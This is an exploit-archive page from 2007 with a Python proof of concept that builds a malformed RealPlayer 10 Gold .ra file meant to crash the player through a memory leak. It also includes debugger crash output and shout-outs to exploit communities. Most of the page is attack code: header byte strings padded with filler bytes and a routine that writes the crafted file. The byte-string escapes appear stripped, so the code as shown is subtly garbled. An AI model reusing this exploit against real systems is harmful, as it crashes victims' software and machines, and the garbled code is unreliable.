[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : RealPlayer 10 (.ra file) Remote Denial of Service Exploit
# Published : 2007-04-30
# Author : n00b
# Previous Title : PowerPoint Viewer OCX 3.2 (ActiveX Control) Denial of Service Exploit
# Next Title : HP Instant Support (Driver Check) Remote Buffer Overflow Exploit PoC
#!/usr/bin/python
###
#*Real player 10 Gold .Ra file remote Dos.
#Credits to n00b for finding this bug
#This bug is a nasty memory leak with in
#Real player 10 gold please remember if
#your guna test it out save all your info
#you need first..Coz your probly guna have
#to reboot also remember all other applications
#will be deprived of page memory so other
#applications might fail upon execution
###
#Tested: On win xp sp 1 / sp 2.
################################################################################
#Pf usage will go from around 120mb-1.40gb
#I've provided the following debug info also
#What i could collect from the crash dump..
#No vital memory address where over written
#Just a nasty memory leak.
################################################################################
#Executable search path is:
#Windows XP Version 2600 (Service Pack 2) UP Free x86 compatible
#Product: WinNt, suite: SingleUserTS Personal
#Debug session time: Sun Apr 29 13:45:27.000 2007 (GMT-7)
#System Uptime: 0 days 0:47:42.649
#Process Uptime: 0 days 0:01:39.000
################################################################################
#This dump file has an exception of interest stored in it.
#The stored exception information can be accessed via .ecxr.
#(420.4a0): Access violation - code c0000005 (first/second chance not available)
#eax=00000001 ebx=00000000 ecx=00000000 edx=00780764 esi=00785110 edi=6334def8
#eip=632164b5 esp=0012ddc8 ebp=0012dfdc iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
#rput3260+0x64b5:
#632164b5 8b11 mov edx,dword ptr [ecx] ds:0023:00000000=????????
################################################################################
#Seams like another memory leak in real-player 10 gold fully patched.
#Im not relying on the debug-info as i had to reboot at crash time
#Vist us at http://blackhat-forums.com/.
################################################################################
import sys
import struct
import time
print"#########################################################################"
print" n00b is credited for find this bug and writing poc. "
print"#########################################################################"
print"# Real player 10 gold .Ra file dos exploit #"
print"# Shouts to every one at milw0rm #"
print"# ======================= #"
print"# Date :Aprill 29 2007 #"
print"# #"
print"# Shouts to marsu your doing a excellent job #"
print"#########################################################################"
print""
print"Special thanks to str0ke"
print""
print"Please wait your file is being created"
time.sleep (2.0)
################################################################################
Main_Header = "x2ex52x4dx46x00x00x00x12x00x01x00x00x00x00x00x00"
Main_Header += "x00x06x50x52x4fx50x00x00x00x32x00x00x00x00xfax53"
Main_Header += "x00x00xfax53x00x00x02xe8x00x00x02xe8x00x00x00x3c"
Main_Header += "x00x00x10xe4x00x00x07x41x00x00xb3xeex00x00x02xac"
Main_Header += "x00x02x00x0dx0ax4dx44x50x52x00x00x00xa4x00x00x00"
Main_Header += "x00x00x00xfax53x00x00xfax53x00x00x02xe8x00x00x02"
Main_Header += "xe8x00x00x00x00x00x00x07x41x00x00x15xfdx0cx41x75"
Main_Header += "x64x69x6fx20x53x74x72x65x61x6dx14x61x75x64x69x6f"
Main_Header += "x2fx78x2dx70x6ex2dx72x65x61x6cx61x75x64x69x6fx00"
Main_Header += "x00x00x56x2ex72x61xfdx00x05x00x00x2ex72x61x35x66"
Main_Header += "x05x63xd7x00x05x00x00x00x46x00x0ex00x00x02xe8x00"
Main_Header += "x00xaex60x00x07x55x6dx00x00x00x00x00x14x02xe8x00"
Main_Header += "xbax00x00x00x00xacx44x00x00xacx44x00x00x00x10x00"
################################################################################
Mid_Header = "x01x67x65x6ex41x41x41x41x41x41x41x41x41x41x41x41"
Mid_Header += "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
Mid_Header += "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
Mid_Header += "x41x41x41x41x41x41x41x41x41x41x00x00x00x00x00x00"
Mid_Header += "x00x62x1fxc1x42x37xc5x7fxd8xaax9bx59x89x0dx91xbb"
Mid_Header += "xcdx29x32xb4xb0xd9x30x0fx05x08x5ex2bx3fx60x23x43"
Mid_Header += "xe2xf3x82x96x81xfexa4x83x8ex2bx32x09x1ax21x1exc9"
Mid_Header += "x8dx00x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
################################################################################
Junk_Header = "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
Junk_Header += "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
Junk_Header += "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
Junk_Header += "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
Junk_Header += "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
Junk_Header += "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
Junk_Header += "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
Junk_Header += "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
Junk_Header += "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
Junk_Header += "x41x41x00x37xc5x11xf2x37xc5x11xf2x37xc5x11xf2x37"
################################################################################
Tail_Header = "xc5x49x4ex44x58x00x00x00x3ex00x00x00x00x00x03x00"
Tail_Header += "x00x00x00xb4x2cx00x00x00x00x00x5cx00x00x02xbex00"
Tail_Header += "x00x00x00x00x00x00x00x07x8cx00x00x3dxcex00x00x00"
Tail_Header += "x14x00x00x00x00x0exbcx00x00x78xdex00x00x00x28x49"
Tail_Header += "x4ex44x58x00x00x00x14x00x00x00x00x00x00x00x01x00"
Tail_Header += "x00x00x00x00"
n00b_file = open("Realplayerdos.ra","wb")
n00b_file.write(Main_Header)
time.sleep (1.0)
n00b_file.write(Mid_Header)
time.sleep (1.0)
n00b_file.write(Junk_Header)
time.sleep (1.0)
n00b_file.write(Tail_Header)
n00b_file.close()
print"File was created."
# www.Syue.com [2007-04-30]